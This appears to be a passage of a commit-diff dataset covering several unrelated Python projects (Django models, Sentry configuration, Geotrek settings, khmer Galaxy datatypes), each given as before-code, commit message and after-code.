def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
<commit_msg>Make Node syncs a noop<commit_after>import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.no_sync=True
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
|
7a5d11229ff68735c16993c61c3a44e6b5ece7a8 | simple_model/__version__.py | simple_model/__version__.py | __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.2'
| __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.3'
| Fix version preparation to 2.0.3 | Fix version preparation to 2.0.3
| Python | mit | lamenezes/simple-model | __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.2'
Fix version preparation to 2.0.3 | __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.3'
| <commit_before>__author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.2'
<commit_msg>Fix version preparation to 2.0.3<commit_after> | __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.3'
| __author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.2'
Fix version preparation to 2.0.3__author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.3'
| <commit_before>__author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.2'
<commit_msg>Fix version preparation to 2.0.3<commit_after>__author__ = 'Luiz Menezes'
__title__ = 'simple-model'
__version__ = '2.0.3'
|
b706c31fe24e4e940108882f420c0509cce94970 | django_databrowse/plugins/objects.py | django_databrowse/plugins/objects.py | from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}
)
| from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.template import RequestContext
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}, context_instance=RequestContext(request)
)
| Add RequestContext for object detail | Add RequestContext for object detail
| Python | bsd-3-clause | Alir3z4/django-databrowse,Alir3z4/django-databrowse | from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}
)
Add RequestContext for object detail | from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.template import RequestContext
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}, context_instance=RequestContext(request)
)
| <commit_before>from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}
)
<commit_msg>Add RequestContext for object detail<commit_after> | from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.template import RequestContext
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}, context_instance=RequestContext(request)
)
| from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}
)
Add RequestContext for object detailfrom django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.template import RequestContext
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}, context_instance=RequestContext(request)
)
| <commit_before>from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}
)
<commit_msg>Add RequestContext for object detail<commit_after>from django import http
from django.core.exceptions import ObjectDoesNotExist
from django_databrowse.datastructures import EasyModel
from django_databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.template import RequestContext
import urlparse
class ObjectDetailPlugin(DatabrowsePlugin):
def model_view(self, request, model_databrowse, url):
# If the object ID wasn't provided, redirect to the model page,
# Which is one level up.
if url is None:
return http.HttpResponseRedirect(
urlparse.urljoin(request.path, '../')
)
easy_model = EasyModel(
model_databrowse.site,
model_databrowse.model
)
try:
obj = easy_model.object_by_pk(url)
except ObjectDoesNotExist, e:
raise http.Http404('Id not found')
except ValueError, e:
raise http.Http404('Invalid format key provided')
return render_to_response(
'databrowse/object_detail.html',
{
'object': obj,
'root_url': model_databrowse.site.root_url
}, context_instance=RequestContext(request)
)
|
f8ff675f8c9a4ef2b370e5254d33b97261a9d8ca | byceps/util/sentry.py | byceps/util/sentry.py | """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
sentry_sdk.set_tag('app_mode', app.config.get('APP_MODE'))
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
| """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
app_mode = app.config.get('APP_MODE')
sentry_sdk.set_tag('app_mode', app_mode)
if app_mode == 'site':
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
| Set Sentry `site_id` tag only in site app mode | Set Sentry `site_id` tag only in site app mode
| Python | bsd-3-clause | homeworkprod/byceps,homeworkprod/byceps,homeworkprod/byceps | """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
sentry_sdk.set_tag('app_mode', app.config.get('APP_MODE'))
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
Set Sentry `site_id` tag only in site app mode | """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
app_mode = app.config.get('APP_MODE')
sentry_sdk.set_tag('app_mode', app_mode)
if app_mode == 'site':
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
| <commit_before>"""
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
sentry_sdk.set_tag('app_mode', app.config.get('APP_MODE'))
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
<commit_msg>Set Sentry `site_id` tag only in site app mode<commit_after> | """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
app_mode = app.config.get('APP_MODE')
sentry_sdk.set_tag('app_mode', app_mode)
if app_mode == 'site':
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
| """
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
sentry_sdk.set_tag('app_mode', app.config.get('APP_MODE'))
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
Set Sentry `site_id` tag only in site app mode"""
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
app_mode = app.config.get('APP_MODE')
sentry_sdk.set_tag('app_mode', app_mode)
if app_mode == 'site':
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
| <commit_before>"""
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
sentry_sdk.set_tag('app_mode', app.config.get('APP_MODE'))
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
<commit_msg>Set Sentry `site_id` tag only in site app mode<commit_after>"""
byceps.util.sentry
~~~~~~~~~~~~~~~~~~
Sentry_ integration
.. _Sentry: https://sentry.io/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from flask import Flask
def configure_sentry_for_webapp(dsn: str, environment: str, app: Flask) -> None:
"""Initialize and configure the Sentry SDK for the Flask-based web
application (both in 'admin' and 'site' modes).
"""
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[FlaskIntegration()],
)
app_mode = app.config.get('APP_MODE')
sentry_sdk.set_tag('app_mode', app_mode)
if app_mode == 'site':
sentry_sdk.set_tag('site_id', app.config.get('SITE_ID'))
def configure_sentry_for_worker(dsn: str, environment: str) -> None:
"""Initialize and configure the Sentry SDK for the RQ worker."""
import sentry_sdk
from sentry_sdk.integrations.rq import RqIntegration
sentry_sdk.init(
dsn=dsn, environment=environment, integrations=[RqIntegration()],
)
sentry_sdk.set_tag('app_mode', 'worker')
|
04b0f21bee9cfef54f4c1138296f86c9694dba95 | geotrek/common/__init__.py | geotrek/common/__init__.py | """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.1)
| """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.5)
| Increase viewport margin (10% was not enough for small screens) | Increase viewport margin (10% was not enough for small screens)
| Python | bsd-2-clause | makinacorpus/Geotrek,makinacorpus/Geotrek,mabhub/Geotrek,GeotrekCE/Geotrek-admin,Anaethelion/Geotrek,makinacorpus/Geotrek,johan--/Geotrek,mabhub/Geotrek,camillemonchicourt/Geotrek,mabhub/Geotrek,GeotrekCE/Geotrek-admin,mabhub/Geotrek,Anaethelion/Geotrek,johan--/Geotrek,camillemonchicourt/Geotrek,johan--/Geotrek,makinacorpus/Geotrek,camillemonchicourt/Geotrek,Anaethelion/Geotrek,johan--/Geotrek,GeotrekCE/Geotrek-admin,GeotrekCE/Geotrek-admin,Anaethelion/Geotrek | """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.1)
Increase viewport margin (10% was not enough for small screens) | """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.5)
| <commit_before>"""
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.1)
<commit_msg>Increase viewport margin (10% was not enough for small screens)<commit_after> | """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.5)
| """
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.1)
Increase viewport margin (10% was not enough for small screens)"""
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.5)
| <commit_before>"""
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.1)
<commit_msg>Increase viewport margin (10% was not enough for small screens)<commit_after>"""
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.5)
|
1b7d84526ac7650f18851610ebef47bdfef828ea | scripts/galaxy/gedlab.py | scripts/galaxy/gedlab.py | """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import os
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
| """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
| Fix pylint warning: Unused import os | Fix pylint warning: Unused import os
| Python | bsd-3-clause | Winterflower/khmer,kdmurray91/khmer,souravsingh/khmer,jas14/khmer,kdmurray91/khmer,Winterflower/khmer,F1000Research/khmer,jas14/khmer,ged-lab/khmer,kdmurray91/khmer,ged-lab/khmer,F1000Research/khmer,ged-lab/khmer,F1000Research/khmer,jas14/khmer,Winterflower/khmer,souravsingh/khmer,souravsingh/khmer | """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import os
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
Fix pylint warning: Unused import os | """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
| <commit_before>"""
